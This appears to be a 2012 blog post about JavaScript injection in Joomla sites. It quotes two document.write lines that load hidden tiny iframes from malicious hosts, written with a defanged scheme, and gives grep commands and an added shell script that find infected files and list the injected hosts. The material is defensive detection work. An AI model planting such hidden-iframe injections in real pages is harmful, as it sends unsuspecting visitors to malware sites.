Archive for November, 2012

New Joomla infections (?) mustmoneyback.cgi

Today, while looking at some systems, I noticed a new pattern in some .js files. Multiple files were infected with the following code:
;document.write('<iframe src="hxxp://hfxgr.sellClassics.com/mustmoneyback.cgi?3" align="center" height="5" width="5"></iframe>');
;document.write('<iframe src="hxxp://lenslifcs.mynumber.org/mustmoneyback.cgi?3" align="center" height="5" width="5"></iframe>');
Other domains were also found calling the same .cgi file. An easy way to look for infections on Plesk systems is the following:
find /var/www/vhosts/ -type f -name '*.js' -print0 | xargs -0 egrep -iw "(km0ae9gr6m|mustmoneyback)"
After locating the infections one can clean up the files …
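
Since the same .cgi call shows up under several domains, it helps to collect the iframe hosts along with the infected file list. The following is an added example, not code from the original post: it reuses the two signature strings from the command above, and the function names and the sample tree (with example.test hosts) are constructed for illustration.

```shell
#!/usr/bin/env bash
# Signature strings taken from the egrep in the post.
SIG='km0ae9gr6m|mustmoneyback'

# infected_files ROOT: print every .js file under ROOT that carries a signature.
infected_files() {
    find "$1" -type f -name '*.js' -exec grep -Eilw -- "$SIG" {} + 2>/dev/null | sort
}

# injected_hosts ROOT: print the distinct hosts the injected iframes load from,
# lowercased, so they can be fed to a proxy/DNS blocklist or searched in logs.
injected_hosts() {
    find "$1" -type f -name '*.js' -exec grep -Eihw -- "$SIG" {} + 2>/dev/null |
        grep -Eio "<iframe[^>]*src=[\"'][a-z]+://[^/\"']+" |
        sed -E 's#.*://##' | tr '[:upper:]' '[:lower:]' | sort -u
}

# make_sample: build a small CONSTRUCTED vhosts-like tree and print its path.
# Hosts are placeholders and the scheme is defanged (hxxp) as in the post.
make_sample() {
    d=$(mktemp -d)
    mkdir -p "$d/site1/js" "$d/site2"
    printf '%s\n' 'var a = 1;' > "$d/site1/js/clean.js"
    printf '%s\n' 'var b = 2;' \
        ";document.write('<iframe src=\"hxxp://one.example.test/mustmoneyback.cgi?3\" height=\"5\" width=\"5\"></iframe>');" \
        > "$d/site1/js/menu.js"
    printf '%s\n' \
        ";document.write('<iframe src=\"hxxp://TWO.example.test/mustmoneyback.cgi?3\"></iframe>');" \
        > "$d/site2/app.js"
    printf '%s\n' 'mustmoneyback' > "$d/site2/notes.txt"   # not .js, must be ignored
    echo "$d"
}

# Usage: script.sh /var/www/vhosts/
if [ "$#" -gt 0 ]; then
    echo "== infected files =="; infected_files "$1"
    echo "== iframe hosts ==";   injected_hosts "$1"
fi
```
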
